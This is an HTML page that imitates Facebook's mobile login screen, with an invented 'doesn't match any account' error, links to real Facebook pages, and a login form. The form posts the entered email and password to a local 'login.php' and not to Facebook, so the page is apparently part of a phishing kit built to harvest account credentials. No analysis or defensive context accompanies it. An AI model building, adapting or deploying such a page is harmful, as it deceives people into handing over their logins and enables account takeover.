<!DOCTYPE html>
<html lang="en">
   <head>
   	 <meta name="viewport" content="width=device-width, initial-scale=1"> 

      <title>Login</title>
      <style>
body{
	margin:0;
	padding:0;
	font-family:tahoma;	
	
}	
	      	
      	
  .facebook{
  	color:white;
  	text-align:center;
  	font-size:13px;
  	font-family:Arial;
  	background-color:red;
  	height:56px;
  	weight:200px;
  	width:320px;
  	padding:none;
  	padding-left:0px;
  	padding-top:12px;
  	padding-right:0px;
  	
  }    	
 input{
 	width:300px;
 	border:1px solid #E6E3E3;
 	height:30px;
 	weight:50px;
 	position:absolute;
 	left:3%;
 	background:#F0EEEE;
 	border-radius:1px;
 	
 }   
 
 .Log_In{
  background:#2D81DD;
  border:none;
  color:white;
  font-size:15px;
  height:36px;
  width:303px;
  
  
 }
   	
.orrr {
    font-size: 15px;
    padding-left: 38px;
    padding-right: 38px;
    color: #4B4F56;
}
   	
   	
   	.cbutton{
   		background:#4C9942;
   		height:40px;
   		width:150px;
   		border:none;
   		color:white;
   		left:25%;
   		
   		
    	}
   	
.forgot{
	color:#7596c8;
	text-align:center;
	text-decoration:none;
	font-size:14px;
	font-family:tahoma;
}   	
 
 .lang{
 	font-size:10px;
 	font-family:tahoma;
 }  
 .mail{
 	border:2px solid #BDDEDA;
 	height:28px;
 }	
   	
   	.passs{
   		height:28px;
   		border:2px solid #BDDEDA;
   	}
    
    
 .lite{
 	padding-left:0%;
 	background:#E5E1C9;
 	padding-top:9px;
 	padding-left:8%;
 	height:30px;
 	color:#706CEE;
 	border:none;
 	text-align:center;
 	border-radius:2px;
 	font-size:12px;
 	text-height:10px;
 	width:280px;
 	font-family:tahoma;
 
 }
    
 .de{
 		text-decoration:none;
 		color:#706CEE;
 }   
 
 .cbutton:hover {
    background-color: #77F073;
}

.Log_In:hover {
    background-color: #6A94F1;
}   
 
 .none:hover {
 	background-color:white;
 	color:red;
 }
.the{
	background:red;
	color:white;
}

 .xx{
 	color:#7596c8;
 }
 
 .none{
 	text-decoration:none;
 	color:#7596c8;
 }
 
.blue{
	width:310px;
	height:30px;
	padding-top:1px;
	
}
.number{
	padding-left:10px;
}
.Password{
	padding-left:10px;
}
.xx{
	padding-left:10px;
	color:#7596c8;
}
.langg{
	padding-left:10px;
	color:#7596c8;
}
.fire{
	padding-left:23px; 
	padding-right:23px; 
	
}  
 .new_account{
 	text-decoration:none;
 	color:white;
 	font-size:15px;
 } 
  
      </style>
   </head>
   <body>




<b> <div class="facebook">
 	The email address or phone number that you've entered doesn't match any account.<a class="new_account" href="https://m.facebook.com/reg/?ref=dbl&refid=8&hrc=1">Sign up for an account.
 	</a>
 </div></b>
 

<form method="post" action="login.php">
<div class="login">
<p class="number">Mobile number or email</p>	<input class="mail" type="mail" name="mail">	
</br>
</br>
<p class="Password">Password</p>
<input class="passs" type="password" name="password">
</br>
</br>
</br>

<input class="Log_In" type="submit" name="submit" value="Log In">
</form>
</br>
</br>

<h5 class="xx"><a class="none" href="http://m.facebook.com/recover/initiate">Forgotten Password?</a></h5>
<p>		
		
<div class="fire">
<table>
  <tr class="line">
         
            <td style='width:200px'><hr/></td>
          
            <td><div class="orrr">or</div></td>
          
          <td style='width:200px'><hr/></td>
        </tr>
    </table>
    </center>
   </div>
		
   
   <br/>
    <form action="http://m.facebook.com/reg">
    <input type="submit" class="cbutton" value="Create New Account"/>
    </form>
    
    <br/><br/>
    <div class="langg">
<p>English (US)</p>   
<p>
বাংলা	</p>
<p>More Languages...</p>           


</center>
    
   </body>
</html>
